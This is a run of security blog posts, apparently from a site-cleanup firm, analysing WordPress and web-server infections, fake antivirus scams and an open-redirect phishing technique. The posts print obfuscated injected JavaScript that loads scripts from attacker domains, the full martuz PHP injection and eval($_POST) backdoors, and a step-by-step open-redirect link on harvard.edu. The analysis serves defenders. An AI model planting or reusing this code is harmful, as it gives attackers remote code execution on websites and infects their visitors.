We’ve been seeing a lot of spam links in WordPress index.php files. Even the “silence is golden” 30 byte index.php files sprinkled throughout a WordPress installation have been infected.

These infected websites had other malicious code as well, but the index.php files had variations of the following code:

<!– /harew–>

<?

$agent = $_SERVER['HTTP_USER_AGENT'];

if(!eregi(“google”,$agent))

{

?>

<div style=”position:absolute; top:-99999px;”>

<?

}

?>

bedava <a href=”http://sikisizleriz.blogspot.com/”>sikis</a> videolarinin bulabileceginiz adrestir tikla sonra git diger sitede sinirsiz video izle

bedava <a href=”http://bedavapornocu.blogspot.com/”>porno</a> videolarinin bulabileceginiz adrestir tikla sonra git diger sitede sinirsiz video izle

bedava <a href=”http://http://grupsikisizle.blogspot.com/”>sex</a> videolarinin bulabileceginiz adrestir tikla sonra git diger sitede sinirsiz video izle

bedava <a href=”http://fulllezizle.blogspot.com/”>lezbiyen</a> videolarinin bulabileceginiz adrestir tikla sonra git diger sitede sinirsiz video izle

bedava <a href=”http://sikisizlex.blogspot.com/”>sikis</a> videolarinin bulabileceginiz adrestir tikla sonra git diger sitede sinirsiz video izle

free <a href=”http://freefullsex.blogspot.com/”>sex</a> videos

free <a href=”http://freesexfull.tumblr.com/”>sex</a> videos

</div>

Currently we see about 12,000+ websites infected with this code. These sites are usually infected with a variety of .htaccess file infections as well, so just removing this code will not clean your website.

For instance, many of them have this in their .htaccess files:

php_value auto_append_file /home/path_to_/public_html/websitename/Thumbs.db

This will add (append) whatever is in the Thumbs.db file to files when the page is rendered. This will show the infectious code in Thumbs.db after running the PHP code in Thumbs.db, when you view source on an infected web page, but when you look in the raw code of the index file, the code won’t be there.

This line is usually preceeded by many, many blank lines in an attempt to hide it. Inside the Thumbs.db file is code like:

<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = “7kyJ7kSK…;$eva1tYlbakBcVSir = “\x67\141\x6f\133\x70\170\x65″;$eva1tYldakBoVS1r = “\x65\143\x72\160″;$eva1tYldakBcVSir = “”;$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>

Which is the infectious code delivered to any web page rendered from the folder with the above .htaccess file.

There doesn’t appear to be any common characteristic of the websites infected with this, other than the infected websites we’ve cleaned have all been WordPress. They were already at the current version, some have the vulnerable timthumb.php files, some don’t. Some are using FCKeditor in one way or another and we have seen this as a successful attack vector for quite awhile.

If you have this type of infection, please post a comment with any other information you may have regarding this. Mostly, what plugins you have on your site. Maybe then as a community we can zero in on the root cause.

If you found this post useful or informative, please Tweet about us, like us on Facebook, or just post a comment.

As always, if you need help cleaning this from your website, please send me an email: traef@wewatchyourwebsite.com.

Thank you.

If anyone reading this blog has wp-phpmyadmin installed on their site you should remove it immediately.

For the past 2 months we’ve been seeing more and more websites with this plugin being infected.

There is usually a file added: upgrade.php that is not part of the legitimate files and has various malicious code inside.

This plugin is no longer on the WordPress plugin repository as it has not been updated since 2007.

While a plugin like this might seem more convenient for database work than using your hosting provider’s control panel, it’s also more convenient for hackers.

We did a Google search on this and found that the majority of websites with this plugin, also don’t have any prevention for viewing the directory this is installed in.

This means that a hacker can click on “Parent Directory” and see all the plugins installed. While this isn’t a huge vulnerability, it’s so easy to prevent with a either a .htaccess file or an empty index.html file.

The less information a hacker knows about your website the better off you are.

What about you? Do you have this installed on your website? Are there other plugins you worry about? Leave a comment here and we’ll investigate it.

Need your website cleaned, protected and monitored? Send us an email: support@wewatchyourwebsite.com

Over the past week or so, we’ve been fighting a new website infection. At first, it appeared to be infecting just one hosting provider, but as we investigated further, we found it was affecting websites on many hosting providers. I’m sorry that it’s taken so long to write about this but we’ve been seeing various new backdoors added to sites and I wanted to fully analyze those before writing this.

What we’re seeing is a malscript inserted either immediately before the legitimate code in certain .js (javascript) files or inserted in html and php files. If it’s in a .js file, you have to be careful because it appears to be part of the entire javascript code. There’s no spaces or line breaks between the malicious code and the legitimate code.

In .html and .php files we’ve usually seen it enclosed by ‘ads’ tags and script tags.

We’ve seen two variations of the malicious code:

The first one starts with:

var st1 = ;this.b=this.M="";this.A="";this.w=false;""...

and ends with:

var gr0=0;

The second starts with: var st1 = 0;document. write( unescape('%3C%73...

and ends with:

gr0=0;

We’ll examine each one here to let you know what they’re doing.

The first one deobfuscates to this:

var a=window.navigator.userAgent,b=/(yahoo|search|msnbot|yandex|googlebot|bing|ask)/i,c=navigator.appVersion; if(document.cookie.indexOf("holycookie")==-1&&!a.toLowerCase().match(b)&&c.toLowerCase().indexOf("win")!=-1){var d=["myads.name","adsnet.biz","toolbarcom.org","mybar.us","freead.name"],e=["axe.","box.","cox.","dex.","fax.","fix.","fox.","gox.","hex.","kex.","lax.","lex.", "lox.","lux.","max.","mix.","nix.","oxo.","oxy.","pax.","pix.","pox.","pyx.","rax.", "rex.","sax.","sex.","six.","sox.","tax.","tux.","vex.","vox.","wax.","xis.","zax."], f=Math.floor(Math.random()*d.length),g=Math.floor(Math.random()*e.length); dt=new Date;dt.setTime(dt.getTime()+9072E4);document.cookie="holycookie="+ escape("holycookie")+";expires="+dt.toGMTString()+";path=/"; document. write ('(script tag) src=" hxxp: // '+e[g]+d[f]+'/system/caption.js" type="text/javascript">(script tag)

When looking at this code, you’ll see that is uses a variety of user-agent strings:

• yahoo
• search
• msnbot
• yandex
• googlebot
• bing
• ask

Then creates an array of domains:

• myads.name
• adsnet.biz
• toolbarcom.org
• mybar.us
• freead.name

and then creates an array of prefixes:

• axe.
• box.
• cox.
• dex.
• fax.
• fix.
• fox.
• gox.
• hex.
• kex.
• lax.
• lex.
• lox.
• lux.
• max.
• mix.
• nix.
• oxo.
• oxy.
• pax.
• pix.
• pox.
• pyx.
• rax.
• rex.
• sax.
• sex.
• six.
• sox.
• tax.
• tux.
• vex.
• vox.
• wax.
• xis.
• zax.

When you consider the number of possible combinations of domains and subdomains, this becomes quite clear the hackers were looking to hide their locations.

The final part of the code puts it all together and adds a little more to the URL:

document. write(' (script tag) src="hxxp : //'+e[g]+d[f]+'/system/caption.js" type="text/javascript">(script tag)

adding the ‘/system/caption.js’ to the end of whatever domain string it’s built.

So a typical string after this first code is decoded might look like:

(script tag) type="text/javascript" src="hxxp: //mix.freead.name/system/caption.js"> (script tag)

The second obfuscated string from above, uses the same basic methodology but uses these domains:

• edisonsnightclub.com
• gaindirectory.org
• ideacoreportal.com
• karenegren.com

and appends one of these strings to the front:

• aqua.
• azure.
• black.
• blue.
• brown.
• chocolate.
• coral.
• cyan.
• darkred.
• fuchsia.
• gold.
• gray.
• green.
• indigo.
• ivory.
• khaki.
• lime.
• magenta.
• maroon.
• navy.
• olive.
• orange.
• pink.
• plum.
• purple.
• red.
• silver.
• snow.
• violet.
• white.
• yellow.

This malscript creates a document.write string that uses one of the above prefixes, one of the above domains and adds ‘/data/mootools.js’ to the end to complete the malscript.

If you’re looking for this malscript in your website, please make sure you grab the entire line all the way to ‘var gr0=0;’ (without the quotes) and nothing more. Otherwise, your legitimate code won’t function properly and you’ll have to restore from backup. Which, may not be a bad thing – unless, of course, you don’t have a good backup.

We’re still investigating how this infection starts. At first we thought it was WordPress based sites only. Then we realized that it was also infecting non-Wordpress sites. It might be the old compromised FTP credentials, but we haven’t been able to gather all our data yet. When we do, we’ll post an update here.

We’re also going to post about the backdoors we’ve found and you can search your site for them as well.

Until then, if you’re infected with this or if Google shows any of these domains in your Safe Browsing Diagnostic report (http://www.google.com/safebrowsing/diagnostic?site=), and you’d like us to clean it for you, please send me an email at traef@wewatchyourwebsite.com

Thank you.

The malicious code that gets injected into these webpages is the following:

Which deobfuscates to:

 What was interesting is that we had to use a valid browser user agent to obtain the in.php file. We used: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0) as our user-agent string. Other similar user-agents worked as well, but they had to be MSIE and Windows compatible so we knew it had to be a Microsoft specific exploit they (the hackers) were attempting on unsuspecting visitors.

You’ll see from the above iframe that the file it references is in.php. Here is the code for in.php:

 (click to enlarge)

Which deobfuscates to:  

As you can see, there are 2 other files that this malscript tries to load:

load.php (which is actually a Windows executable)

and

pdf.php (which is an actual PDF file that uses ActionScript to try and infect the visitor’s PC).

At the time of our investigation, the malware load.php was only detectable by 2 out of 41 anti-virus companies. Here is the VirusTotal report on that little gem:

And pdf.php was detectable by 11 out of 41 anti-virus programs. Here is the Virus Total report on that file:

Inspecting the FTP log files for the infected website we found that the majority of the FTP traffic on the day the infected files were modified was from the following IP addresses:

The interesting thing about this FTP traffic from various places around the world is that the exact same FTP username and password were used. There weren’t any failed login attempts with this username for the prior 6 months so we didn’t feel it was a brute force or dictionary attack on a weak password. This leads us to believe that this infection is another case of compromised FTP credentials.

Another interesting point is that the FTP traffic from these various IP addresses happened within minutes of each other and the number of files transferred from each IP address was 2. It appears from this information that the attackers were using a distributed network of compromised PCs (read botnet) to send the modified files to the website server.

This could be for a number of reasons.

But the one reason that seems most obvious is that the attackers know many people try to block their IP addresses. By using a botnet of remotely controlled PCs a website owner would have to block dynamic IP addresses. Would you block a range of IP addresses from a DSL connection in the United States? Probably not.

Having a website means handling traffic from visitors all over the world. If you’re going to start blocking groups of IP addresses, how will you know when you’re blocking innocent visitors? Wouldn’t that hurt your business?

The IP address that d0lpin.biz is hosted on show this for their whois:

The whois on the domain d0lphin.bz is:

Google’s report on the network hosting d0lphin.biz shows:

On Wednesday July 22, 2009 we started seeing what looks to be a new round of beladen style website infections by cybercriminals.

The reason we think they’re beladen style is that they appear to infect all the websites on shared servers and they also seem to be remotely controlled with a “on as needed” mode.

This infection resulted in thousands more sites being tagged with Google’s “This site may harm your computer”.

According to Google Diagnostics for certain websites we were asked to help with, this is what was shown:

“Malicious software is hosted on 4 domain(s), including: ventsol.info/, ina6co.com/, goscansoon.com/.”

Other sites we were asked to help with were also showing these domains in their Google Diagnostics:

• daobrains.info/
• safetyshareonline.com/
• goslimscan.com/
• goscansome.com/
• globalsecurityscans.com/

Our scanners were detecting suspicious obfuscated javascript on the sites we were helping with, but it appeared to only be setting cookies to expire the following day. The obfuscated javascript was this:

Which deobfuscated looks like:

sessionid=39128605A531; path=/; expires=Thu, 23 Jul 2009 18:42:32 GMT

We found similar code with various names for the “var” part (replacing oigmlob) above in the obfuscated code. Other names were:

• dtxzidl
• bmno
• wcdg
• tpet
• stqfpbc
• meuhgor

In addition, we also saw various combinations of the hexidecimal numbers to replace the actual letters. For instance, instead of pa\x74h=/\x3b ex\x70ir\x65s we found these as well:

• p\x61th=/\x3b exp\x69r\x65s
• p\x61\x74h=/\x3b \x65x\x70i\x72es
• p\x61t\x68=/\x3b expi\x72e\x73

All of these deobfuscate to: path=/; expires

One common theme was the hosting providers. Wouldn’t you know that a day after we blog about how wrongly accused many hosting providers are for the gumblar, martuz and iframe infections that they actually become the target.

It appears that these recent infections are a server issue and not just a specific website on a shared server. How the server became infected is purely speculation. Could it have been from one set of compromised FTP credentials that was able to infect the server and then control other sites as well? Could it have been SQL injection for one site that then gave the attackers a method to start a process on the server thereby controlling all the websites on that server?

Who knows. At this point all we do know is that this does affect all the websites on infected servers.

How do we know that?

We created a program for situations like this. It grabs a list of all the websites for a specific IP address and starts checking them. On some IP addresses 91% of the websites were showing the obfuscated cookie code from above. Our thought is that since this is an “on again – off again” type of infection, the other 9% were dormant when our program scanned those sites.

Another interesting observation was that for a specific IP address, each website showed the exact same obfuscated code. While websites on different IP addresses had similar obfuscated code with the slight variations mentioned previously.

The first step in this “drive-by” infection was to set a cookie on the visitor’s PC. Then if that same visitor came back within the expiration period of the cookie (24 hours), this would be delivered to their browser:

Which essentially does a Meta tag redirect. The above deobfuscates to:

We did see some of the other domains mentioned earlier in place of safetyshareonline.com and the goscansoon.com.

The whole purpose of this attack is to infect the PCs of visitor’s to these websites. This is done with this bit of social engineering code:

This code uses some fake graphics (okay the graphics are real, but they’re not the “official” graphics of Microsoft) in an attempt to trick the visitor into believing they have a virus. The code starts by checking to see if the operating system on the visitor’s PC is Microsoft’s Vista. If it is, it displays “Vista” looking graphics. If not Vista, then it assumes Windows XP and shows different graphics.

No matter who you are or what operating system and browser you have, this code shows a window that looks like a “Windows Security Center” window and it informs you that:

 ”Virus (I-Worm.Trojan.b) was found on your computer! Click OK to install System Security Antivirus.” If you select “OK” from their screen it will download their “antivirus”.

If you cancel, a new alert is displayed with this message:

 ”Windows Security Center recommends you to install System Security Antivirus.”

If you cancel that, it will display again.

One more cancel gets you to this message:

“Your computer remains infected by viruses! They can cause data loss and file damages and need to be cured as soon as possible. Return to System Security and download it to secure your PC”

This is some very elaborate scheming by hackers and cybercriminals just to get visitors to download their “mother lode of infectious code”, but it will probably work on many people.

We decided to show the code here, although the code is inserted graphic files, so that if your website starts being tagged as suspicious by Google with some of the domains listed here, and you get the “This site may harm your computer” moniker, you can compare this code to some of the code you might see in your site and have a better understanding of what is going on.

What To Do

First you need to contact your hosting provider. Have them read this blog post so they can also better understand what’s going on.

Have them check at the server level for unusual processes running on the server. If you’d like, have them contact us and we can help them diagnose this further. We can show them the other websites on your server that are also infected with the exact same code.

At this point we still don’t know how the server gets infected. Be prudent and scan your PCs with a different anti-virus than what you’re currently using. Why? Because if you are infected and you have anti-virus already installed, then it’s obvious that the virus knows how to evade detection of your current security.

We’ve had good success with AVG, Avast or Avira. If you already have one of those installed, then use one of the others. You need to use something different. Scan and clean all PCs with FTP access to your site.

Then change FTP passwords on all of your accounts.

This will have to be done as soon as you start seeing these infections as it may take some time to fully investigate and remediate – so don’t be late (sorry, it’s been a long few days).

Post comments below if you’ve been infected by this or know someone who has.

Thank you.

Friday July 24, 2009 update: We worked with a couple different hosting providers who had servers infected with this and it appears the way these malscripts are injected into the the webpages is through a process on the server. The cybercriminals have cleverly named this process “crontab” however this process runs under the user name “nobody” typically the same user name that Apache (or httpd) runs as.

The file that executes this process is remotely deleted by the cybercriminals controlling it so it just runs in memory. Once the server is rebooted, the process disappears and doesn’t appear to return. The hosting providers also mentioned implementing suPHP as an aid to blocking this from happening again.

This is quite clever as how many times does a shared server really get rebooted? Probably not very often unless there’s a reason to shut-down numerous (hundreds?) websites all at once.

Keep posted, we’ll be adding more information as we get it.

We were tasked with helping a website owner find all the malscripts on his site and remove them. He, like many, learned that his site was an infectious website delivering malicious code with an email from Google.

This website owner had tried removing the code himself from the infected webpages and yet his site was still blacklisted by Google. This was killing his sales as anyone visiting with Firefox as their browser, or Chrome,  were greeted with a big warning:

This site may harm your computer.

After about a week of trying to rectify the problem himself, he contacted us.

He provided us FTP access to his site so we could tackle it.

After downloading his site (which literally took 3 hours) we started scanning. We grep’d for the word “base64_decode” and found over 228 php files all with the following malscript:

(php tag removed) if(!fun ct ion_ex ists(‘tmp_lkojfghx’)){if(is set ($_POST['tmp_lkojfghx3'])) eval($_POST['tmp_lkojfghx3']) ;if(!defined(‘TMP_XHGFJOKL’)) define(‘TMP_XHGFJOKL’,b ase64_de cod e(‘PHNjcmlwdCBsYW5ndWFnZT 1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBWaXRMPSclJzt2YXIgU3VvPSd2YXJfMjB hXzNkXzIyU2NyaV83MHRFbmdfNjluZV8yMl8yY2JfM2RfMjJWZXJzaV82Zm4oKStfMjJfMmNqX zNkXzIyXzIyXzJjdV8zZG5hdl82OWdfNjF0XzZmcl8yZV83NV83M182NXJfNDF nZW50XzNiaWYoXzI4dV8yZWluZGV4T2ZfMjhfMjJfNDNocl82Zl82ZGVfMjIpXzNjXzMwXzI5XzI2 XzI2KHVfMmVpbmRfNjV4T2YoXzIyV182OV82ZV8yMilfM2UwKV8yNl8yNl8 yOHVfMmVpbmRleF80Zl82Nl8yOF8yMk5UXzIwNl8yMilfM2MwKV8yNl8yNihfNjRvY183NW1fNjV uXzc0XzJlXzYzb29rXzY5ZV8yZWluXzY0ZXhPZihfMjJtaWVrXzNkMV8yMil fM2NfMzApXzI2XzI2KF83NHlwZW9fNjYoXzdhXzcyXzc2enRzXzI5XzIxXzNkdHlwXzY1b182NihfMjJ BXzIyKSkpXzdienJfNzZ6Xzc0c18zZF8yMkFfMjJfM2Jldl82MWwoXzI yaWYoXzc3aW5kXzZmd18yZV8yMithXzJiXzIyKWpfM2RqK18yMitfNjErXzIyXzRkYWpvcl8yMl8yY mIrYStfMjJNaW5vcl8yMitiK2ErXzIyQl83NWlfNmNkXzIyXzJiYitfMjJ qXzNiXzIyKV8zYmRvY183NW1fNjVfNmVfNzRfMmV3cml0ZShfMjJfM2NfNzNfNjNyaV83MF83NF8y MHNfNzJjXzNkXzJmXzJmbWFyXzIyK18yMl83NF83NXpfMmVfNjNuXzJmdml kXzJmXzNmXzY5ZF8zZF8yMitfNmErXzIyXzNlXzNjXzVjXzJmc2NyaXBfNzRfM2VfMjJfMjlfM2JfN2Qn O2V2YWwodW5lc2NhcGUoU3VvLnJlcGxhY2UoL18vZyxWaXRMKSkpfSk oKTsKIC0tPjwvc2NyaXB0Pg==’));fu nc tion tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(su bstr($s,10,-8)); if(preg_match_all(‘#<script(.*?)</sc ri pt>#is’,$s,$a))for ea ch($a[0] as $v) f(count(exp lo de(“\n”,$v))>5) {$e=preg_match(‘#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#’,$v)||preg_m atch(‘#[\(\[](\s*\d+,){20,}#’,$v); if((pr eg_match(‘#\beval\b#’,$v)&&($e||str pos($v,’from Char Code’)))||($e&&strpos($v,’document.write’)))$s=str_replace($v,”,$s);} $s1=preg_re pl ace(‘#<sc ri pt lan gu age=java scri pt><!– \n\(fun ct ion\(.+?\n –></script>#’,”,$s);if(stristr($s,’<body’)) $s=preg_replace(‘#(\s*<body)#mi’,TMP_XHGFJOKL.’\1′,$s1);elseif(($s1!=$s)||stristr($s,’</body’)||stristr($s,’</title>’)) $s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0) {$s=array();

if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d); foreach(@ob_get_status(1) as $v) if(($a=$v['name'])==’tmp_lkojfghx’)re t urn;else $s[]=array($a==’default output handler’?false:$a); for($i=count($s)-1;$i>=0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start(‘tmp_lkojfghx’); for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler(‘tmp_lkojfghx2′))!=’tmp_lkojfghx2′) $GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

The base64_decode section evaluates to this:

<script language=javascript><!–

(f u n c t i o n(){var VitL=’%';var Suo=’var_20a_3d_22Scri_70tEng_69ne_22_2cb_3d_22Versi_6fn()+_ 22_2cj_3d_22_22_2cu_3dnav_69g_61t_6fr_2e_75_73_65r_41gent_3bif (_28u_2eindexOf_28_22_43hr_6f_6de_22)_3c_30_29_26_26(u_2eind_65xOf(_22W_69_6e_22) _3e0)_26_26_28u_2eindex_4f_66_28_22NT_206_22)_3c0)_26_26 (_64oc_75m_65n_74_2e_63ook_69e_2ein_64exOf(_22miek_3d1_22)_3c_30)_26_26(_74ypeo _66(_7a_72_76zts_29_21_3dtyp_65o_66(_22A_22))) _7bzr_76z_74s_3d_22A_22_3bev_61l(_22if(_77ind_6fw_2e_22+a_2b_22)j_3dj+_22+_61+_ 22_4dajor_22_2bb+a+_22Minor_22+b+a+_22B_75i_6cd_22_2bb+_22j_3b_22) _3bdoc_75m_65_6e_74_2ewrite(_22_3c_73_63ri_70_74_20s_72c_3d_2f_2fmar_22+_22_ 74_75z_2e_63n_2fvid_2f_3f_69d_3d_22+_6a+_22_3e_3c_5c_2fscrip_74_3e_22_29_3b_7d’; e v a l(un esc ape(Suo.replace(/_/g,VitL)))})(); –></script>

Which deobfuscates to:

var a=”S cri ptE ng ine”,b=”Version()+”,j=”",u=na vi g ator.user A gent;if((u.indexOf(“Ch rome”)<0)&&(u.indexOf(“Win”)>0)&&(u.indexOf(“NT 6″)<0)&& (do cu ment.coo kie.ind exOf(“miek=1″)<0)&&(typeof(zrvzts)!=typeof(“A”))){zrvzts=”A”;ev al(“if(window.”+a+”)j=j+”+a+”Major”+b+a+”Minor”+b+a+”Build”+b+”j;”); doc um ent.w ri te(“<sc ri pt src=//mar”+”tuz.cn/vid/?id=”+j+”><\/script>”);} if(window.Script Engine)j=j+ScriptEng ineMajorVersion()+ScriptEng ineMinorVersion()+Scrip tEngine BuildVersion()+j; <script src=//martuz.cn/vid/?id=></script>

a typical martuz infection.

Using PowerGrep we did a search and replace on this text and replaced every occurrence with “”.

We dug further into the files returned with our search for the word “base64_decode” and found 2 php files in every folder name “images”. These 2 files were named “image.php” and “gifimg.php” and inside each was the following code:

(php tags removed) eval(base64_decode(‘aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1Rb J2UnXSkpOw==’)); (php tags removed)

Which decodes to:

if(isset($_POST['e']))eval(base64_decode($_POST['e']));

Which just decodes whatever text string is POST’d to this file.

To test, we encoded some commands and setup a little script to POST to this form with our commands. It worked!

In addition to these 2 files we found many others in various folders that contained the same code. We’re working on determining how these files are named. It almost seems random, but in order for this to be an automated process we feel that there must be some algorithm in creating the file names. Otherwise, the cybercriminals would have to keep a database or list of each site name and the file name associated with that site. This is highly unlikely as they are into automated routines and keeping a list like that just doesn’t make much sense.

Being that this was martuz, we felt confident in recommending that the client change from FTP to either FTPS or SFTP and then scan their PC fully before accessing the site again. With this new twist of having these php files accept scripts and run them, we are concerned about this new form of infection.

We have seen some people report that you have to replace these php files with an empty file of the same name. That might be the case in some situations, none that we’ve seen, but that would require that the cybercriminals had another file on your site that monitored those files. That monitoring program needs to be found and eliminated.

Another interesting thing about the file names is that WordPress installations have files named image.php obviously with different code, but that tactic might be to deter people from just “willy nilly” deleting those files.

Stay tuned as we have many, many more websites to clean. We’ll be reporting on them as we obtain more information.

Yes it’s true. The rock n roll icon Paul McCartney had his website hacked. (This attack isn’t necessarily originating in Russia, but I couldn’t refuse the obvious opportunity.)

It’s amazing how certain hackings follow the news. It was just a couple days ago when I was watching the news on TV (yes that old, outdated media) and learned that Paul McCartney and Ringo Starr were going to get back together for a “reunion” tour.

The website hacking could have been purely coincidental, as the toolkit planted on his website – Luckysploit, has been used in many, many recent website malware distributions. It could be that the cybercriminals behind this exploit  just happened to find this site vulnerable to their recent attack. I believe it’s irrelevant how or why, their timing was impeccable.

This is another example of social engineering used successfully to infect more computers.

Think of the millions of Beatle’s fans (my father-in-law is one of them – a fan not a virus victim) hearing about this reunion and flocking to Mr. McCartney’s website to find out where their concerts will be performed only to find out at the next anti-virus scan that they’ve been compromised by a bank login and password stealing virus.

The nerve of these hackers. Using something so “in the news” to lure millions of people to  infectious websites that have been planted with malicious code, appearing to be legitimate websites, for the sole purpose of delivering a virus that is currently evading detection by many anti-virus programs.

Is there no shame?

This attack is being carried out by the Zeus botnet. Yes while everyone was watching out for Conficker, many forgot about the other botnets out there.

It’s easy to spot the infectious malware code in the “source” of the web page. All you have to do is look for something that’s impossible to read because it is encrypted and obfuscated to avoid easy detection. Luckily for us, we don’t look for specific infections while scanning websites. Our systems are based on any changes to a website. We pay close attention to changes that include specific keywords, but our alert system is based on any changes made to a website.

Once again the cybercriminals use a popular event to spread their malware. This particular infection will steal banking credentials which are then sold on the open black market. This is one of the cybercriminals profit centers. They have many.

Be careful when using the Internet, you never know if you’re getting more than you bargained for.

Other Beatle’s songs that come to mind with my sub-titles:

“Do You Want to Know a Secret” (about my malware)

“Don’t Ever Change” (my website)

“Don’t Let Me Down” (please click on this infectious link)

“Eight Days a Week” (and I’ll infect you every one of them)

“Everybody’s Got Something to Hide Except Me and My Monkey” (okay maybe my monkey has some malware to hide too)

“Fixing a Hole” (in your website)

“Free as a Bird” (free as in free malware)

“From Me to You” (more malware from me to you)

“Get Back” (to where you can get infected)

“Got To Get You Into My Life” (so I can hack you some more)

“Help!” (I need the services of WeWatchYourWebsite)

“I Am the Walrus” (I live Belarus) (okay you find something that goes with Walrus)

I could go on, but the Beatles wrote a lot of songs and I need to save server space.

Let’s be careful out there…

Continuing on from Round 1, I decided to take a step further and show you exactly how susceptible you are to a socially engineered infection through Twitter. Actually it’s more an attack through TinyURL.com, but since Twitter automatically converts URLs in your Tweets (ugh!), it is an attack via Twitter.

For this example, let’s say that a hacker wants to construct a website that references some research on Harvard’s website. It would be on a topic that is of high interest at the moment.

First the hacker (cybercriminal) would use Google Trends (www.google.com/trends) to see what’s hot. As of today (03/02/2009) the list is as follows:

• granville waiters
• nyc doe
• wavy tv 10
• new york city department of education
• dr. seuss birthday
• opm.gov
• wvec
• nyc public school closings
• nyc board of education
• newport news public schools

These are the top 10.

Nothing in there that is really eye catching that covers a broad scope of people. I’ll use dr. seuss birthday.

Our cybercriminal would construct some basic information about how Harvard University has created this research paper detailing the events behind Dr. Seuss stories. Our cybercriminal needs to have something that already indicates some legitimacy and some validation. For this scenario I’m using Harvard University for 2 reasons; they already carry a huge credibility factor and they have a cross-site scripting (XSS) vulnerability that let’s me use their URL for redirection.

The cybercriminal would take the XSS URL and instead of redirecting the reader to another page inside of Harvard’s website, use it to redirect the unsuspecting reader to their malicious website.

Here is the original URL: http://hms.harvard.edu/lshell/WhitePagesdefault.asp?task=staffandfaculty&theurl=

By appending any URL we want to the end of the above string, it will look like we’re sending you to harvard.edu, however, this vulnerability will actually take you somewhere else.

For instance, if I wanted to send you to my website I would use:

http://hms.harvard.edu/lshell/WhitePagesdefault.asp?task=staffandfaculty&theurl=http://www.wewatchyourwebsite.com

Go ahead and click on that and you’ll see what I mean.

Now, that’s not too bad. I if showed you that link in an email or on my Twitter account, you might not see the end of the URL and just click on it to see what Harvard has to say about Dr. Seuss.

But remember that Twitter uses TinyURL.com which converts any long URLs into “tiny” URLs. Plugging that long URL into TinyURL.com’s website it gives me:

http://www.tinyurl.com/av46js

With TinyURL.com’s preview function I could see the exact URL of the above TinyURL. Maybe you’d see the redirection at the end and maybe not.

Now, our crafty cybercriminal knows that TinyURL.com has this preview function, so he (we’ll assume a male hacker) converts the URL of his malicious website to one you can’t recognize. This is called URL obfuscation (I love using that word).

This would take my URL of http://www.wewatchyourwebsite.com and convert it to: %68%74%74%70%3a%2f%2f%77%77%77%2e%77%65%77%61%74%63%68%79%6f%75%72%77%65%62%73%69%74%65%2e%63%6f%6d

If you saw this by itself, hopefully you’d be suspicious and avoid the urge to click on it. However, when used at the backend of an already long URL, you might just throw caution into the wind and click away.

Our Harvard URL would become:

http://hms.harvard.edu/lshell/WhitePagesdefault.asp?task=staffandfaculty&theurl=%68%74%74%70%3a%2f%2f%77%77%77%2e%77%65%77%61%74%63%68%79%6f%75%72%77%65%62%73%69%74%65%2e%63%6f%6d

Which when converted to a TinyURL.com would result in: http://tinyurl.com/bnq5ej

Go ahead and click on that to see what I mean. As of today, that XSS on Harvard’s site has not been fixed so it will load their frame, but inside will be our home page. Keep in mind that even with TinyURL.com’s preview function, you would only see the obfuscated URL with all the percent signs. This might give you a false sense of security and decide to trust your “gut” and go for it. That’s what the cybercriminal is hoping for.

Obviously our website isn’t going to infect your computer, however, if the redirection URL were to take you to the cybercriminals infectious webpage, you’d be infected and not even know it.

To recap, the purpose of this information is to show you the steps a cybercriminal would follow to use social engineering to spread their malware. They would use Google Trends to find a hot topic, they would use the credibility of some other site, Harvard in this example, they would use obfuscation to hide their work from people who know what to look for and they would use Twitter or some other social networking site to find as many people as they could.

As stated earlier, this isn’t so much a vulnerability of Twitter as it is with TinyURL.com, but since Twitter uses TinyURL.com, it does reflect back on them.

Any comments, questions or remarks? Please post them (unless it’s SPAM).

My first review will be Twitter. I selected Twitter because it’s widely used and even easier for social engineering than some of the others.

First a little background on Twitter. Many people categorize Twitter as a “micro” blog. This means you can post short (140 character) messages that communicate your current thoughts, actions, wants or needs.

From their website Nicholas Carr describes it as “the telegraph system of Web 2.0″ while the New York Times states, “It’s one of the fastest growing phenomena on the Internet.”

The first thing I noticed about Twitter is that most links posted by members are the shortened version of a full URL. Some of the more populare sites for these services are:

• TinyURL.com
• bit.ly
• get-shorty.com
• SnipURL.com

These services take a URL like: http://www.wewatchyourwebsite.com/defacements/HackedByAL-GaRNi-sample-2.jpg and convert it to something like: www.tinyurl.com/88888

Using these shortened URLs on Twitter allows members to include some description with their link.

I’ve always had a problem with these shortened URLs. Having seen numerous SPAM messages with embedded shortened URLs in order to evade detection, I set out to investigate further.

You never know what the ultimate destination is when clicking on these links. You could easily be led to an infectious webpage. Infectious websites are one of the most popular tactics of cybercriminals to deliver their malware.

I scanned our SPAM traps for messages that included these shortened URLs. I used one of our secured systems to see where these links ultimately delivered my browser.

Much to my surprise, all of the links that used TinyURL.com delivered the following message:

“The TinyURL (shows link) you visited was used by it’s creator in violation of our terms of use. TinyURL has a strict no abuse policy and we apologize for the intrusion this user has caused you. Such violation of our terms of use include:

• Spam – Unsolicited Bulk E-mail
• Fraud or Money Making scams
• Malware
• or any other use that is illegal”

This tells me that they’re either policing their links or that they actually take action on misuse of their service – this is awesome. I suggest that before clicking on any TinyURL, replace tinyurl.com with preview.tinyurl.com. For instance if you see a link like: http://www.tinyurl.com/8888, before clicking on it, change the URL to: http://preview.tinyurl.com/8888. The resulting webpage will show you exactly where the link will take you with a link that says, “Proceed to this site.”

I know this is somewhat of an inconvenience, but so is having your PC sending millions of SPAM messages after you’ve been added to a huge botnet.

You see, with any security situation, you always have to consider the risk involved when the potentially weakest link is the responsibility of someone else.

With these shortened URLs, you’re depending on the URL shortening service to provide you with some level of protection.
